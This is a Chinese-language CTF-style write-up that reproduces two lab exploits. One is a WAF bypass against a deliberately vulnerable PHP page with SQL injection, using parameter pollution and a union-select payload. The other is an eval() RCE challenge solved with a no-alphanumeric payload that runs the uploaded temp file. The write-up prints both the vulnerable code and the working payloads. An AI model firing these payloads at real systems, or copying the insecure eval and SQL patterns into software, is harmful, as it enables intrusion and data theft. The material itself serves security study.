漏洞
- 贷齐乐的漏洞复现
- RCE
贷齐乐的漏洞复现
<?php
header("Content-type: text/html; charset=utf-8");
require 'db.inc.php';function dhtmlspecialchars($string) {if (is_array($string)) {foreach ($string as $key => $val) {$string[$key] = dhtmlspecialchars($val);}}else {$string = str_replace(array('&', '"', '<', '>', '(', ')'), array('&', '"', '<', '>', '(', ')'), $string);if (strpos($string, '&#') !== false) {$string = preg_replace('/&((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);}}return $string;}function dowith_sql($str) {$check = preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);if ($check) {echo "非法字符!";exit();}return $str;}
/}// 经过第二个WAF处理$request_uri = explode("?", $_SERVER['REQUEST_URI']);//i_d=1&i.d=aaaaa&submit=1if (isset($request_uri[1])) {$rewrite_url = explode("&", $request_uri[1]);//print_r($rewrite_url);exit;foreach ($rewrite_url as $key => $value) {$_value = explode("=", $value);if (isset($_value[1])) {//$_REQUEST[I_d]=-1 union select flag users$_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));}}}if (isset($_REQUEST['submit'])) {$user_id = $_REQUEST['i_d'];$sql = "select * from ctf.users where id=$user_id";$result=mysqli_query($sql);while($row = mysqli_fetch_array($result)){echo "<tr>";echo "<td>" . $row['name'] . "</td>";echo "</tr>";}}
?>
过滤的关键就在于这个:
preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);
1)hpp全局污染,php接受相同参数。取后者
2)i.d在php中$_REQUEST,自动转为i_d,而 $request_uri 接收i.d就是i.d
3)注入绕过 =(like) 单引号(十六进制) 空格(/**/)
第二个Wuf的绕过:
http://127.0.0.1/daiqile/index.php?submit=aaaaaaa&i_d=-1/**/union/**/select/**/1,schema_name,3/**/from/**/information_schema.schemata/**/limit/**/0,1&i.d=1
RCE
<?php
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>35){die("Long.");}if(preg_match("/[A-Za-z0-9_$]+/",$code)){die("NO.");}eval($code);
}else{highlight_file(__FILE__);
}查看源代码后,发现有防范,那么应该如何去绕过呢?
if(strlen($code)>35 if(preg_match("/[A-Za-z0-9_$]+/",$code)){
这里的两条限制了长度,限制了字母和数字
这里我们运用临时文件去做一个绕过,编写一个HTML文件
然后咋们去进行burpsuit抓包,将抓到的包放入repeater里面
然后就是最重要的一点,就是看我最上面的红框,写入绕过代码:
?code=?><?=`.+/???/????????[@-[]`;?>
这个代码在burp中可以这样写,但是在页面的搜索框中输入的话,要将其编码
转换成编码应该是这个:
3F%3E%3C%3F%3D%60%2E%2B%2F%3F%3F%3F%2F%3F%3F%3F%3F%3F%3F%3F%3F%5B%40%2D%5B%5D%60%3B%3F%3E
最后就实现了
